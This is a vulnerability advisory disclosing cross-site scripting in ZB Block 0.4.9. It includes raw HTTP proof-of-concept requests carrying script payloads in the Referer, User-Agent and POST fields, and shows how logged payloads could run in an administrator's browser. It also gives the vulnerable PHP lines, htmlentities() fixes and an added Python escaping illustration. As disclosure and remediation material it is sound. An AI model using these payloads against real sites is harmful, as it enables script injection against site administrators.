
ZB Block Cross Site Scripting
Posted Mar 5, 2012
Authored by Akastep

ZB Block version 0.4.9 Final suffers from cross site scripting vulnerabilities in the User-Agent and Referer headers.

tags | exploit, vulnerability, xss
SHA-256 | c14c01d2f9b5490074a0f43558bc480240ede588e35082f8a3c66d424173a91e

--------------------------------------------------------------------------------------------------------------------
Vulnerable Software:
// ZAPHOD BREEBLEBROX'S BLOCKER A.K.A. ZB BLOCK
// VERSION 0.4.9 Final "Jaguar"
0.4.9_Final
Developed by HTTP://WWW.SPAMBOTSECURITY.COM
--------------------------------------------------------------------------------------------------------------------
Severity: *Low*
--------------------------------------------------------------------------------------------------------------------
Vulnerability Description: XSS-(CROSS SITE SCRIPTING VULNERABILITIES)
--------------------------------------------------------------------------------------------------------------------
Found by: AkaStep
-------------------------------------------------------------------------------------------------------------------
Description:
ZB Block is distributed under the GNU/GPL Version 2 License.
Its main goal:
Act as a "Honeypot" on your site and block intrusions.
For more info:
SPAMBOTSECURITY.COM
-------------------------------------------------------------------------------------------------------------------
Vulnerability Desc:
Due "trust" to HTTP_USER_AGENT and HTTP_REFERER
ZB Block is vulnerable to non-persistent cross site scripting vulnerability.
However it also logs attacks so unsanitized thus variables will be writen to killed_logs.txt
which on "future" may act as Persistent Cross Site Scripting Vulnerability against admin.
-------------------------------------------------------------------------------------------------------------------


Proof of Concept:
====================Triggering Attack Against Site which is protected using ZB Block========================
cmd> GET /myfiles/10/zbblock/hackme.php?id=<script>alert("Is it safe?");</script> HTTP/1.0
cmd> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
cmd> Referer: http://microshit.attacks/you?id=<script>alert("Pwn using Referer");</script>
cmd> User-Agent: <script>alert("Pwn Using user Agent");</script>
cmd> Host: 192.168.0.15
cmd>
hdr> HTTP/1.1 403 FORBIDDEN
hdr> Date: Mon, 05 Mar 2012 13:36:51 GMT
hdr> Server: Apache
hdr> Status: 403 FORBIDDEN
hdr> Warning: 199 192.168.0.15:80 You_are_abusive/hacking/spamming_192.168.0.15
hdr> Abuse: Your connection is not welcome due to: http javascript (wedge end/script start) injection. XSS attack obfuscation. http javascript (wedge end/script start) injection. http javascript (wedge start/script end) injection. http javascript (wedge end/script start) injection. http javascript (wedge start/script end) injection.
hdr> Content-Length: 3890
hdr> Content-Type: text/html
RequestDone Error = 0
StatusCode = 403
================= END OF REQUEST ======================================

Response: (Take a look: it doesn't touch HTTP_REFERER and HTTP_USER_AGENT, and they are the same as the "original", without any sanitization)
--------------------------------------------------- SNIPPET GOES -------------------------------------------------------
<strong><font color="#0000FF">Record #:</font></strong> 1<br>
<strong><font color="#0000FF">Time:</font></strong> Mon, 05 Mar 2012 13:36:51 +0000<br>
<strong><font color="#0000FF">Running:</font></strong> 0.4.9_Final<br>
<strong><font color="#0000FF">Host:</font></strong> labmachine.mshome.net<br>
<strong><font color="#0000FF">IP:</font></strong> 192.168.0.1<br>
<strong><font color="#0000FF">Post:</font></strong> <br>
<strong><font color="#0000FF">Query:</font></strong> id=<script>alert("Is<br>
<strong><font color="#0000FF">Stripped Query:</font></strong> id=<script>alert("is<br>
<strong><font color="#0000FF">Referer:</font></strong> http://microshit.attacks/you?id=<script>alert("pwn using referer");</script><br>
<strong><font color="#0000FF">User Agent:</font></strong> <script>alert("Pwn Using user Agent");</script><br>
<strong><font color="#0000FF">Reconstructed URL:</font></strong> http:// 192.168.0.15 /myfiles/10/zbblock/hackme.php?id=<script>alert("Is<br>
<br>&nbsp;&nbsp;&nbsp;&nbsp;Generated by <a href="http://www.spambotsecurity.com/zbblock.php" >ZB Block 0.4.9_Final</a></p>
</body>
</html>
--------------------------------------------------- END OF SNIPPET -------------------------------------------------------


Print Screen:

http://i009.radikal.ru/1203/71/7d0fd71f5c5d.png



/*----------------------------------------------VULNERABLE CODE--------------------------------------------------------------*/
//zbblock.php
// LINE NO 455 && 459

if(isset($_SERVER['HTTP_REFERER'])){$fromhost2=@$_SERVER['HTTP_REFERER'];}
$fromhost=strtolower($fromhost2);
$fromhostsws=preg_replace('/\s+/','',$fromhost);
$fromhostsws=preg_replace("/[^\x9\xA\xD\x20-\x7F]/",'',$fromhostsws);
if(isset($_SERVER['HTTP_USER_AGENT'])){$useragent=@$_SERVER['HTTP_USER_AGENT'];}
$lcuseragent=strtolower($useragent);
$lcuseragentsws=preg_replace('/\s+/','',$lcuseragent);
$lcuseragentsws=preg_replace("/[^\x9\xA\xD\x20-\x7F]/",'',$lcuseragentsws);
/*------------------------------------- END OF VULNERABLE CODE -------------------------------------------------------*/

By default this script writes a log file:
filename: killed_log.txt
Exists in: {zbblockWHERE_INSTALLED}/vault/killed_log.txt
which is not readable over HTTP (because access to that area is protected using .htaccess (Deny from all)).

OK, let's see its content after triggering the attack:


-----------------------------------------------------------------------------------------------------------------------------------------
# cat -n killed_log.txt|less
1 <?php die(''); ?>
2
3 #: 1 @: Mon, 05 Mar 2012 13:36:09 +0000 Running: 0.4.9_Final
4 Host: labmachine.mshome.net
5 IP: 192.168.0.1
6 Score: 6
7 Violation count: 0
8 Why blocked: http javascript (wedge end/script start) injection. XSS attack obfuscation. http javascript (wedge end/script
start) injection. http javascript (wedge start/script end) injection. http javascript (wedge end/script start) injection. http ja
vascript (wedge start/script end) injection.
9 Query: id=<ScRiPt>AlErT("Not
10 Referer: http://microshit.attacks/you?id=<script>alert("pwn using referer");</script>
11 User Agent: <script>alert("Pwn Using user Agent");</script>
12 Reconstructed URL: http:// 192.168.0.15 /myfiles/10/zbblock/hackme.php?id=<ScRiPt>AlErT("Not
13
14 #: 1 @: Mon, 05 Mar 2012 13:36:51 +0000 Running: 0.4.9_Final
15 Host: labmachine.mshome.net
16 IP: 192.168.0.1
17 Score: 6
18 Violation count: 1
19 Why blocked: http javascript (wedge end/script start) injection. XSS attack obfuscation. http javascript (wedge end/script
start) injection. http javascript (wedge start/script end) injection. http javascript (wedge end/script start) injection. http ja
vascript (wedge start/script end) injection.
20 Query: id=<script>alert("Is
21 Referer: http://microshit.attacks/you?id=<script>alert("pwn using referer");</script>
22 User Agent: <script>alert("Pwn Using user Agent");</script>
23 Reconstructed URL: http:// 192.168.0.15 /myfiles/10/zbblock/hackme.php?id=<script>alert("Is
24
------------------------------------------------------------------------------------------------------------------------------------------------


As you can see:
10 Referer: http://microshit.attacks/you?id=<script>alert("pwn using referer");</script>
11 User Agent: <script>alert("Pwn Using user Agent");</script>
21 Referer: http://microshit.attacks/you?id=<script>alert("pwn using referer");</script>
22 User Agent: <script>alert("Pwn Using user Agent");</script>

Same as the original. In the future this may cause problems for the site administrator.
Not exploitable because it's a .txt file protected using .htaccess? :)
This gives us a small advantage to catch the site admin and trigger our XSS automatically.
There is a chance the admin will read that file using some "reader script", believing that killed_log.txt is safe.
For example:

----------------------------------------------------------------------------------------------------------------------------------------------
<?php

echo '<pre>' .
file_get_contents('./vault/killed_log.txt') . '</pre>';

?>
----------------------------------------------------------------------------------------------------------------------------------------------


So there is a chance to execute our javascript (HTML) in the context of the admin's browser.


The fix is simple:
ZB Block developer(s) should note that HTTP_USER_AGENT and HTTP_REFERER aren't trustworthy and may be spoofed
or injected easily.
So htmlentities() or strip_tags() are our best friends in this case :)
------------------------------------------------- FIX 1---------------------------------------------------------------------------------------
//zbblock.php
//LINE NO 455
if(isset($_SERVER['HTTP_REFERER'])){$fromhost2=htmlentities(@$_SERVER['HTTP_REFERER']);}
//LINE NO 459
if(isset($_SERVER['HTTP_USER_AGENT'])){$useragent=htmlentities(@$_SERVER['HTTP_USER_AGENT']);}
// END OF
-----------------------------------------------------------------------------------------------------------------------------------------------


There is also another non-persistent XSS when ZB Block detects a POST request intrusion attempt.

--------------------------------------------- POST METHOD--------------------------------------------------------------------------------------
cmd> POST /myfiles/10/zbblock/hackme.php HTTP/1.0
cmd> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
cmd> Referer: http://192.168.0.15/myfiles/10/zbblock/hackme.php
cmd> Content-Type: application/x-www-form-urlencoded
cmd> Host: 192.168.0.15
cmd> Content-Length: 58
cmd>
hdr> HTTP/1.1 403 FORBIDDEN
hdr> Date: Mon, 05 Mar 2012 17:53:01 GMT
hdr> Server: Apache
hdr> Status: 403 FORBIDDEN
hdr> Warning: 199 192.168.0.15:80 You_are_abusive/hacking/spamming_192.168.0.15
hdr> Abuse: Your connection is not welcome due to: POST JS POST-058. POST JS POST-059.
hdr> Content-Length: 3548
hdr> Content-Type: text/html
RequestDone Error = 0
StatusCode = 403
POSTDATA: f=<script>alert("Pwned");</script>&fupl=G%F6nd%26%23601%3Br%21
// Note that our payload is not URL-encoded //
-------------------------------------------------------------------------------------------------------------------------------------------------
Response:
----------------------- SNIPPET -------------------------------------------------------------------------------------
<strong><font color="#0000FF">Post:</font></strong> f=<script>alert("Pwned");</script>&fupl=G%F6nd%26%23601%3Br%21<br>

----------------------- END OF SNIPPET -------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------------------------------

So why does this occur?

Again, let's look at the code:
------------------------------------------ VULNERABLE CODE -------------------------------------------------------------
//zbblock.php
// Line: no: 856
<strong><font color="#0000FF">Post:</font></strong> ' . $rawpost . '<br>
//
------------------------------------------------------------------------------------------------------------------------


// And if we look further up, at line no: 472
$rawpost=file_get_contents("php://input");

// No sanitization again.
// I think:
/*--------------------------- Since the POST data is not logged to killed_logs.txt
and is only printed to the client side, on line 855 we can use:


<strong><font color="#0000FF">Post:</font></strong> ' . htmlentities($rawpost) . '<br>


This also applies to line no: 838

$dummy = $ini['e_mail'] . '?subject=Event ID:#' . $zbcounter . ' on ' . $thishost . '&body=' . htmlentities($dummy);

---------------------------------------------------------- EOF --------------------------------------------------------------------------------*/
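As an added illustration (not part of this advisory or of ZB Block's code), the following Python mirrors the normalisation applied to HTTP_REFERER and HTTP_USER_AGENT on lines 455-459 of zbblock.php, shows that it leaves HTML metacharacters untouched, and contrasts it with escaping at the point of output, which is the same fix for the header case, the raw POST body and the admin-side log reader above. The header values and log lines are constructed samples modelled on the PoC.

```python
import html
import re

# Constructed header values modelled on the advisory's PoC (not real traffic).
HEADERS = {
    "HTTP_REFERER": 'http://example.invalid/you?id=<script>alert("ref");</script>',
    "HTTP_USER_AGENT": "<script>alert('ua');</script>",
}

# Constructed killed_log.txt lines in the layout shown in the advisory.
LOG_LINES = [
    "#: 1 @: Mon, 05 Mar 2012 13:36:51 +0000 Running: 0.4.9_Final",
    "User Agent: <script>alert('ua');</script>",
]


def zb_normalise(value: str) -> str:
    """Python mirror of zbblock.php lines 455-459: lowercase, drop whitespace,
    drop bytes outside printable ASCII. None of these steps touch '<', '>',
    '"' or "'", so markup survives into the 403 page and into the log."""
    value = value.lower()
    value = re.sub(r"\s+", "", value)
    return re.sub(r"[^\x09\x0A\x0D\x20-\x7F]", "", value)


def html_escape(value: str) -> str:
    """Output-context escaping, the equivalent of PHP htmlentities() with
    ENT_QUOTES for ASCII input. Apply it wherever a request-controlled value
    is echoed into HTML: the 403 page, the mailto body and $rawpost alike."""
    return html.escape(value, quote=True)


def has_markup(value: str) -> bool:
    """Does the string still carry HTML metacharacters after processing?"""
    return any(c in value for c in "<>\"'")


def render_log_safely(lines) -> str:
    """Hardened version of the page's reader script: escape every line of
    killed_log.txt at render time instead of trusting the file's contents."""
    return "<pre>" + "\n".join(html_escape(line) for line in lines) + "</pre>"


if __name__ == "__main__":
    for name, raw in HEADERS.items():
        print(f"{name}\n  normalised: {zb_normalise(raw)}\n  escaped:    {html_escape(raw)}")
    print(render_log_safely(LOG_LINES))
```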



/AkaStep ^_^












